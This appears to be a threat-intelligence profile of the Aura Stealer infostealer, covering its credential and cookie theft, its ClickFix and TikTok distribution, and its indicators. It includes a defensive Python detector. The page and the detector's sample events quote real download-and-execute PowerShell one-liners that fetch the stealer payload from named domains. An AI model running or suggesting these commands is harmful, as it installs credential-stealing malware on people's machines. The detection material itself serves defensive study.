Aura Stealer
Aura Stealer is an information-stealing malware family first observed in 2025; public reporting places initial observation in July 2025, with a separate identification in September 2025. It is marketed as a low-cost stealer and advertised with Telegram bot integration, configurable options, and ongoing updates, including claimed support for decrypting data from newer Chromium-based browser versions. Reported capabilities include theft of saved browser credentials, authentication cookies, cryptocurrency wallet data, and credentials or session data from other applications. The family targets Chromium-based browsers, and its operators specifically advertise improved decryption support for Chrome/Chromium version 144 and later, the versions whose application-bound encryption changes broke older stealers' cookie and password decryption.
Behaviorally, Aura Stealer has been reported to inject into explorer.exe, retrieve Base64-encoded configuration data from its command-and-control infrastructure, perform theft actions according to that configuration, and Base64-encode collected data before exfiltration. AhnLab reports that it attempts to contact three C2 domains in sequence for redundancy and uses specific API endpoints. Observed distribution includes fake cracks and keygens delivered through SEO poisoning, posts on legitimate websites, forums, community platforms, and social media, as well as ClickFix-style social engineering. One highlighted campaign used viral TikTok videos posing as activation guides for Windows, Microsoft 365, Photoshop, Spotify Premium, and other software and services; viewers were instructed to run a PowerShell one-liner such as iex (irm slmgr[.]win/photoshop), which fetched a script that downloaded updater.exe from file-epq[.]pages[.]dev, identified as an Aura Stealer variant.
Public reporting associates the malware with broader infostealer activity rather than with a named intrusion set. It was among the most distributed infostealers in ASEC's November 2025 reporting, alongside ACRStealer, LummaC2, and Rhadamanthys, and its distribution reportedly increased significantly from October 2025 onward. It has also been used in ClickFix campaigns affecting the sectors broadly targeted by that technique, though no Aura-specific industry targeting has been established. High-confidence observables named in reporting include slmgr[.]win and file-epq[.]pages[.]dev/updater.exe.
Techniques & procedures
9 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution (3 techniques)
Each video displays a short one-line command and tells viewers to run it as an administrator in PowerShell: iex (irm slmgr[.]win/photoshop)
Mertens says that an additional payload will be downloaded, named source.exe, which is used to self-compile code using .NET's built-in Visual C# Compiler (csc.exe).
The videos are performing a ClickFix attack, which is a social engineering technique that provides what appears to be legitimate "fixes" or instructions that trick users into executing malicious PowerShell commands or other scripts that infect their computers with malware.
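As an added detection example (not code from this page or from any vendor named on it), the following Python scans constructed process-creation and script-block style events for the three execution procedures documented above: the iex (irm ...) download-and-execute one-liner in either operand order, the refanged domains reported for this campaign, and csc.exe launched by PowerShell, which is what the source.exe self-compilation step would look like in process telemetry. The event field names (process, parent, cmd) and the sample events are assumptions chosen for illustration, not real log data.

```python
import re

# Constructed sample endpoint events (not from any real incident): the kind of
# fields a PowerShell script-block or process-creation log would carry.
SAMPLE_EVENTS = [
    {"id": 1, "process": "powershell.exe", "parent": "explorer.exe",
     "cmd": "iex (irm slmgr.win/photoshop)"},
    {"id": 2, "process": "powershell.exe", "parent": "explorer.exe",
     "cmd": "Invoke-Expression (Invoke-RestMethod -Uri 'http://slmgr.win/office')"},
    {"id": 3, "process": "csc.exe", "parent": "powershell.exe",
     "cmd": r"csc.exe /noconfig /fullpaths @C:\Users\u\AppData\Local\Temp\x.cmdline"},
    {"id": 4, "process": "powershell.exe", "parent": "explorer.exe",
     "cmd": r"Get-ChildItem C:\Users\u\Documents | Measure-Object"},
    {"id": 5, "process": "powershell.exe", "parent": "cmd.exe",
     "cmd": r"iwr https://file-epq.pages.dev/updater.exe -OutFile $env:TEMP\updater.exe"},
    {"id": 6, "process": "powershell.exe", "parent": "explorer.exe",
     "cmd": "irm slmgr.win/spotify | iex"},
]

# Defanged indicators exactly as they appear in the reporting above.
DEFANGED_IOCS = ["slmgr[.]win", "file-epq[.]pages[.]dev"]

# Execution aliases and download cradles are matched separately so that both
# "iex (irm ...)" and the piped form "irm ... | iex" are caught.
EXEC_RE = re.compile(r"(?i)\b(iex|invoke-expression)\b")
CRADLE_RE = re.compile(
    r"(?i)\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b")
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def refang(indicator):
    """Turn a defanged indicator back into the form seen in telemetry."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def classify(event, iocs):
    """Return the list of reasons an event is suspicious (empty if none)."""
    cmd = event["cmd"]
    reasons = []
    if EXEC_RE.search(cmd) and CRADLE_RE.search(cmd):
        reasons.append("download-and-execute one-liner (ClickFix pattern)")
    lowered = cmd.lower()
    for ioc in iocs:
        if refang(ioc).lower() in lowered:
            reasons.append(f"known Aura Stealer indicator: {ioc}")
    # csc.exe under PowerShell is the process-tree shape of the source.exe
    # self-compilation step described in the reporting.
    if event["process"].lower() == "csc.exe" and event["parent"].lower() in POWERSHELL:
        reasons.append("csc.exe spawned by PowerShell (runtime self-compilation)")
    return reasons


def scan(events, iocs=DEFANGED_IOCS):
    """Return [(event_id, reasons)] for every event that triggered at least one rule."""
    hits = []
    for ev in events:
        reasons = classify(ev, iocs)
        if reasons:
            hits.append((ev["id"], reasons))
    return hits


if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: " + "; ".join(reasons))
```

Against the constructed events this flags 1, 2, 3, 5 and 6 and leaves the benign Get-ChildItem invocation alone. The cradle-only event (5) is caught purely by the domain match, which is the point of pairing behavioural rules with the campaign's indicators: the behavioural rule alone would miss a download without an inline iex, and the indicator alone would miss the next domain. Legitimate administration scripts do use iwr and Invoke-RestMethod, so in production the download-and-execute rule is best scoped to interactive parents such as explorer.exe and to the user-pasted one-liner shape rather than to scheduled or signed scripts.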
Privilege Escalation (1 technique)
Stealth (3 techniques)
Credential Access (3 techniques)
Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from other applications and uploads them to the attackers, giving them access to your accounts.
"Improved decryption of the latest versions of Chromium-based browsers (144+)... Now different versions of Chrome (before 143 / after 144) are decrypted with different elevators, and the method is selected dynamically"; and "listings typically include browser passwords, cookies, and session tokens."
IOCs tracked for this family
20 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Infostealer marketed on dark web forums; focuses on stealing Chromium-based browser data and includes version-aware, dynamic decryption logic to bypass Chrome’s application-bound encryption changes (notably Chrome 144+). Includes geo/language checks and CIS-region exclusions, and uses compile-time hashing of WinAPI names to reduce static indicators.
Information stealer marketed with Telegram bot integration and configurable options.
Infostealer that injects into explorer.exe, receives configuration from C2, steals information, and exfiltrates it in Base64-encoded form. Uses multiple C2 domains and specific API endpoints for communication.
Information-stealing malware offered as a low-cost subscription service; reported as newly emerging in 2025.